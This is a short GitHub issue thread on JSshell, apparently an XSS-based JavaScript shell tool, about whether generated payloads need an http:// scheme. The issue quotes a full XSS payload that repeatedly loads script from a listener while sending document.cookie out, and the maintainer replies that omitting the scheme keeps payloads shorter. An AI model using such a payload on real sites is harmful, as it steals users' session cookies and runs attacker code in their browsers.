### ISSUE TITLE
The payload is missing url scheme

### ISSUE THREAD

**Issue by kiven7299** [shelld3v/JSshell#8]
The generated payload needs to include `http://` scheme, for example: `<script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="http://127.0.0.1:4444/?"+document.cookie},1010)</script>`.

**Comment by shelld3v** [comment]
Hi @kiven7299, normally if you don't select the scheme in the `src` attribute, browser will automatically recognize it as `http`. Removing the scheme from the URL helps the payloads to be shorter.

I hope that answered your question
